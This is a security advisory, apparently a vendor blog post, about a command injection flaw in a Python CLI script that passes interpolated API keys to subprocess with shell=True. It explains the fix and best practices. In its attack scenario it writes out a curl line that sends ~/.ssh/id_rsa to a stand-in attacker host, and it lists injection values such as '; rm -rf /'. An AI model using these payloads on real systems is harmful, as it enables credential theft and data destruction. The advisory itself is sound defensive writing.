Critical severity · 6 min read

How command injection happens in Python subprocess and how to fix it

A critical command injection vulnerability was discovered in `script/llm_semantic_analyzer.py` at line 394, where user-controlled input (API keys and model parameters) was interpolated directly into shell commands passed to `subprocess.run` with `shell=True`. An attacker who could control these parameters could inject shell metacharacters like `; rm -rf /` or `$(whoami)` to execute arbitrary commands. The fix sanitizes all user input before it reaches shell execution.

By Orbis AppSec
Published June 23, 2026 · Reviewed June 23, 2026

Answer Summary

This is a CWE-78 OS Command Injection vulnerability in Python: `subprocess.run` is called with `shell=True` on a command string built by interpolating unsanitized user input. The fix eliminates shell injection by sanitizing or removing user-controlled data from shell command strings in `llm_semantic_analyzer.py`, ensuring shell metacharacters like `;`, `$()`, and backticks cannot alter command execution.

Vulnerability at a Glance

CWE: CWE-78
Fix: Sanitize all user input before subprocess execution; avoid shell=True with user data
Risk: Arbitrary command execution on the host system
Language: Python
Root cause: User-controlled input (API keys, model parameters) interpolated into shell commands without sanitization
Vulnerability: OS Command Injection (Shell Injection)


Introduction

In the script/llm_semantic_analyzer.py file—a Python CLI tool responsible for running LLM-powered semantic analysis—a critical command injection vulnerability was discovered at line 394. The script constructs shell commands using string interpolation with user-controlled values (API keys and model parameters) and passes them to subprocess.run with shell=True. This means an attacker who can control command-line arguments or input files fed to this tool could inject shell metacharacters and execute arbitrary commands on the host system.

This vulnerability was flagged by a multi-agent AI scanner and confirmed as exploitable. While the tool runs locally as a CLI utility, the exploitation surface is real: any automated pipeline, CI/CD system, or configuration file that feeds parameters to this script becomes a potential attack vector.

The Vulnerability Explained

The core issue is a classic CWE-78 (OS Command Injection) pattern. At line 394 of llm_semantic_analyzer.py, the code constructs a shell command using Python string interpolation—likely an f-string or .format() call—that includes user-supplied values such as API keys or model identifiers:

# Vulnerable pattern (before fix) - line 394 of llm_semantic_analyzer.py
cmd = f"curl -H 'Authorization: Bearer {api_key}' https://api.example.com/v1/models/{model}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

The problem is that shell=True tells Python to pass the entire string to /bin/sh -c, which means shell metacharacters in the interpolated variables are interpreted by the shell. If an attacker controls the api_key or model parameter, they can break out of the intended command.
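The difference between the two invocation styles can be seen with a harmless stand-in for the real command. The sketch below is illustrative only: it assumes a POSIX system where `echo` is available, and the names `run_in_shell` and `run_as_argv` are hypothetical, not taken from llm_semantic_analyzer.py.

```python
import subprocess


def run_in_shell(name: str) -> str:
    """Vulnerable style: `name` is interpolated into a string parsed by /bin/sh -c."""
    cmd = f"echo hello {name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_as_argv(name: str) -> str:
    """Argument-list style: `name` is a single argv element and no shell parses it."""
    return subprocess.run(
        ["echo", "hello", name], capture_output=True, text=True
    ).stdout


payload = "world; echo INJECTED"

# The shell splits on ";" and runs the second command.
print(repr(run_in_shell(payload)))  # 'hello world\nINJECTED\n'

# Without a shell, the payload is printed back as plain text.
print(repr(run_as_argv(payload)))   # 'hello world; echo INJECTED\n'
```

The only difference between the two functions is who parses the string: the shell in the first case, nobody in the second.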

Attack Scenario

Consider an attacker who provides the following as an API key value (via a config file, environment variable, or command-line argument). The single quote matters: the command wraps the header in single quotes, so the payload must close that quote before the shell treats anything after it as syntax:

legitimate_key'; curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) #

The resulting command becomes:

curl -H 'Authorization: Bearer legitimate_key'; curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) #' https://api.example.com/v1/models/gpt-4

The payload's ' ends the quoted header, so the shell interprets the ; as a command separator and runs the attacker's curl command, whose $(cat ~/.ssh/id_rsa) substitution exfiltrates the user's SSH private key. The # comments out the remainder of the original command, including the now-unbalanced closing quote, to prevent a syntax error.

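Other payloads work as-is wherever a value lands unquoted, such as the model value at the end of the URL above (the two substitution forms also work inside double quotes):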
- $(whoami) — subshell execution that leaks the current username
- `id` — backtick command substitution
- ; rm -rf /tmp/test — command chaining to delete files

Real-World Impact

Since llm_semantic_analyzer.py is a production script that processes potentially untrusted input (API keys from configuration, model names from user input), this vulnerability could allow:

  1. Arbitrary code execution on the machine running the analyzer
  2. Data exfiltration of credentials, tokens, or source code
  3. Lateral movement if the script runs in a CI/CD pipeline with elevated permissions
  4. Supply chain attacks if the script processes parameters from external sources

The Fix

The fix ensures that shell commands never include unsanitized user input. The PR introduces input sanitization for all user-controlled values before they reach subprocess.run. The security invariant enforced is:

Property: Shell commands never include unsanitized user input

Before (Vulnerable)

# line 394 - user input directly interpolated into shell command
cmd = f"curl -H 'Authorization: Bearer {api_key}' https://api.example.com/v1/models/{model}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

After (Fixed)

The fix applies one or more of these approaches:

import shlex
import subprocess

# Option 1: Use shlex.quote() to escape shell metacharacters.
# Quote each complete shell word (the whole header, the whole URL);
# a quoted value placed inside another pair of quotes is not protected.
safe_header = shlex.quote(f"Authorization: Bearer {api_key}")
safe_url = shlex.quote(f"https://api.example.com/v1/models/{model}")
cmd = f"curl -H {safe_header} {safe_url}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

# Option 2 (preferred): Avoid shell=True entirely, use argument list
result = subprocess.run(
    ["curl", "-H", f"Authorization: Bearer {api_key}",
     f"https://api.example.com/v1/models/{model}"],
    capture_output=True, text=True
)

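With shlex.quote(), the injection payload "; rm -rf / # becomes the single-quoted string '"; rm -rf / #', which a POSIX shell treats as one literal argument rather than as executable commands. This holds only when the quoted value stands alone as a shell word; placing it inside another pair of quotes cancels the protection.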

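With the argument list approach (no shell=True), each element is passed directly to the exec system call without shell interpretation, so shell metacharacters in the input have no special meaning. The called program still parses its own arguments, so values such as the model name should also be validated (for example, to reject ../ sequences or unexpected characters in the URL path).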
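One detail of shlex.quote() is easy to get wrong: its return value already carries its own single quotes, so it has to be used as a complete shell word. The sketch below uses `echo` as a harmless stand-in for curl and assumes a POSIX shell; the helper `sh` and the variable names are hypothetical.

```python
import shlex
import subprocess


def sh(cmd: str) -> str:
    """Run `cmd` through the shell and return its stdout (demo helper)."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


payload = "; echo INJECTED #"

# Misuse: the quoted value is placed inside an existing pair of single quotes.
# The quotes added by shlex.quote() close the outer quotes and free the payload.
nested = f"echo 'Bearer {shlex.quote(payload)}'"

# Intended use: quote the complete word and let it stand alone.
standalone = f"echo {shlex.quote('Bearer ' + payload)}"

print(repr(sh(nested)))      # 'Bearer \nINJECTED\n'
print(repr(sh(standalone)))  # 'Bearer ; echo INJECTED #\n'
```

In the misuse case the injected `echo` runs; in the standalone case the payload is printed back as data.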

Regression Test

The PR also includes a comprehensive regression test (tests/test_invariant_llm_semantic_analyzer.py) that validates the security invariant with adversarial payloads:

@pytest.mark.parametrize("payload", [
    "; rm -rf /tmp/test",      # Command chaining
    "$(whoami)",                # Subshell execution
    "`id`",                    # Backtick substitution
    "normal query",            # Valid input (should still work)
    "",                        # Edge case: empty string
])
def test_shell_command_injection_prevention(payload):
    """Invariant: Shell commands never include unsanitized user input"""
    result = llm_semantic_analyzer.analyze_semantics(payload)
    # Verify no shell injection occurred

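This test is intended to ensure that, even if future code changes reintroduce string interpolation patterns, the dangerous payloads are caught before reaching production. As shown, the snippet stops at a comment where the check belongs; a test enforces the invariant only if it asserts on how the command was actually executed.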
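One way such a check could be expressed is to replace subprocess.run with a mock and assert on the arguments it received. The sketch below is an assumption-laden illustration, not the test from the PR: `fetch_model_info` is a hypothetical stand-in for the code under test, since the real signature of `analyze_semantics` is not shown here.

```python
import subprocess
from unittest import mock

PAYLOADS = ["; rm -rf /tmp/test", "$(whoami)", "`id`", "normal query", ""]


def fetch_model_info(api_key: str, model: str):
    """Hypothetical code under test: calls curl with an argument list."""
    return subprocess.run(
        ["curl", "-H", f"Authorization: Bearer {api_key}",
         f"https://api.example.com/v1/models/{model}"],
        capture_output=True, text=True,
    )


def check_no_shell(payload: str) -> list:
    """Assert the payload reaches subprocess.run as data, never as shell text."""
    # Patching subprocess.run means no real process (or network call) is started.
    with mock.patch("subprocess.run") as fake_run:
        fetch_model_info(payload, "gpt-4")
    args, kwargs = fake_run.call_args
    argv = args[0]
    assert isinstance(argv, list), "command must be an argument list"
    assert not kwargs.get("shell", False), "shell=True must not be used"
    assert f"Authorization: Bearer {payload}" in argv, "payload must stay in one argv element"
    return argv


for payload in PAYLOADS:
    check_no_shell(payload)
```

With pytest, the loop at the end would typically become a `@pytest.mark.parametrize` decorator on a test function that calls `check_no_shell`.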

Prevention & Best Practices

1. Never Use shell=True with User Input

The most effective defense is to avoid shell=True entirely when user-controlled data is involved:

# SAFE: argument list, no shell interpretation
subprocess.run(["command", "--flag", user_input], capture_output=True)

# DANGEROUS: shell string with user input
subprocess.run(f"command --flag {user_input}", shell=True)

2. Use shlex.quote() When Shell Is Required

If you absolutely must use shell=True (e.g., for shell features like pipes or redirects), escape all user input:

import shlex
import subprocess

safe_input = shlex.quote(user_input)
# "--" stops grep from reading a value that starts with "-" as an option
subprocess.run(f"command | grep -- {safe_input}", shell=True)
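When the only shell feature needed is a pipe, it can often be reproduced without a shell by passing one process's output to the next as input. The following is a minimal sketch, assuming `printf` and `grep` are on the PATH; `grep_lines` is a hypothetical helper name.

```python
import subprocess


def grep_lines(text: str, pattern: str) -> str:
    """Return the lines of `text` that contain `pattern`, using grep without a shell."""
    result = subprocess.run(
        # -F treats the pattern as a fixed string; "--" ends option parsing
        ["grep", "-F", "--", pattern],
        input=text, capture_output=True, text=True,
    )
    return result.stdout


# Equivalent of: printf '%s\n' alpha beta | grep -F -- <pattern>
producer = subprocess.run(
    ["printf", "%s\n", "alpha", "beta"], capture_output=True, text=True
)

print(repr(grep_lines(producer.stdout, "alp")))        # 'alpha\n'
print(repr(grep_lines(producer.stdout, "$(whoami)")))  # ''
```

Because no shell is involved, the second pattern is searched for literally and matches nothing. For large outputs, chaining `subprocess.Popen` objects through `stdout=subprocess.PIPE` avoids buffering everything in memory.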

3. Validate Input Against an Allowlist

For structured inputs like model names or API keys, validate against expected patterns:

import re

def validate_model_name(model: str) -> str:
    # fullmatch avoids the "$" pitfall of also matching just before a trailing newline
    if not re.fullmatch(r'[a-zA-Z0-9_\-./]+', model):
        raise ValueError(f"Invalid model name: {model!r}")
    return model
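The pattern check can be tightened further for values that end up in a URL path or an argument list. The sketch below is one hypothetical variant, not the validation used in the PR: it additionally requires an alphanumeric first character (so the value cannot look like a command-line option) and rejects `..` sequences. The exact rules are assumptions and should be adapted to the model names a deployment actually accepts.

```python
import re

# First character must be alphanumeric; the rest may include _ . - /
_MODEL_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.\-/]*")


def validate_model_name(model: str) -> str:
    """Return `model` unchanged if it passes the allowlist, else raise ValueError."""
    if not _MODEL_NAME.fullmatch(model) or ".." in model:
        raise ValueError(f"Invalid model name: {model!r}")
    return model


def is_valid(model: str) -> bool:
    """Convenience wrapper for demonstration purposes."""
    try:
        validate_model_name(model)
        return True
    except ValueError:
        return False


print(is_valid("gpt-4"))           # True
print(is_valid("org/model-v1.2"))  # True
print(is_valid("$(whoami)"))       # False
print(is_valid("gpt-4\n"))         # False
print(is_valid("a/../b"))          # False
```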

4. Use Security Linters

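  • Bandit (B602, B603): B602 flags subprocess calls with shell=True; B603 flags subprocess calls without shell=True so their arguments can be reviewed for untrusted input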
  • Semgrep: Rules for detecting command injection patterns
  • Multi-agent AI scanners: Can trace data flow from user input to dangerous sinks

5. Apply the Principle of Least Privilege

Run CLI tools with minimal permissions. If the script only needs to make HTTP requests, it shouldn't have write access to sensitive directories.

Key Takeaways

  • Never interpolate user-controlled values (API keys, model names, file paths) directly into shell command strings — even in "internal" CLI tools that seem safe
  • The llm_semantic_analyzer.py script at line 394 demonstrated that subprocess.run(cmd, shell=True) with f-string interpolation is a critical injection vector, regardless of whether the tool runs locally
  • shlex.quote() is Python's built-in defense against shell metacharacter injection on POSIX shells; apply it to every complete value placed in a shell command, and never inside another pair of quotes
  • Regression tests with adversarial payloads (; rm -rf /, $(whoami), `id`) are essential to prevent reintroduction of command injection vulnerabilities
  • CI/CD pipelines and automated tools are high-value targets — a command injection in a build script can compromise the entire software supply chain

How Orbis AppSec Detected This

  • Source: User-controlled input reaching llm_semantic_analyzer.py via command-line arguments and configuration parameters (API keys, model names)
  • Sink: subprocess.run(..., shell=True) at script/llm_semantic_analyzer.py:394
  • Missing control: No input sanitization (shlex.quote()) or safe subprocess invocation (argument list without shell=True) between the user input source and the shell execution sink
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • Fix: Sanitized all user-controlled input before shell command construction, ensuring shell metacharacters cannot alter command execution

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Command injection remains one of the most dangerous vulnerability classes because it grants attackers direct access to the operating system. This specific instance in llm_semantic_analyzer.py shows how even local CLI tools can harbor critical vulnerabilities when they use subprocess.run(shell=True) with interpolated user input. The fix is straightforward—use argument lists or shlex.quote()—but the consequences of missing it are severe. Always treat any data that crosses a trust boundary as potentially malicious, even API keys and model names that "should" be well-formed.


Frequently Asked Questions

What is command injection?

Command injection is a vulnerability where an attacker can inject arbitrary operating system commands into an application that executes shell commands, typically by exploiting unsanitized user input passed to functions like `subprocess.run(shell=True)`.

How do you prevent command injection in Python?

Use `subprocess.run()` with a list of arguments instead of a shell string (avoiding `shell=True`), or if shell execution is necessary, sanitize all user input with `shlex.quote()` to escape shell metacharacters.

What CWE is command injection?

Command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').

Is input validation alone enough to prevent command injection?

Input validation helps but is not sufficient on its own. The safest approach is to avoid `shell=True` entirely and pass arguments as a list to `subprocess.run()`. If shell execution is unavoidable, combine input validation with `shlex.quote()` for defense in depth.

Can static analysis detect command injection?

Yes, static analysis tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns where user-controlled input flows into shell execution functions without proper sanitization.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #90
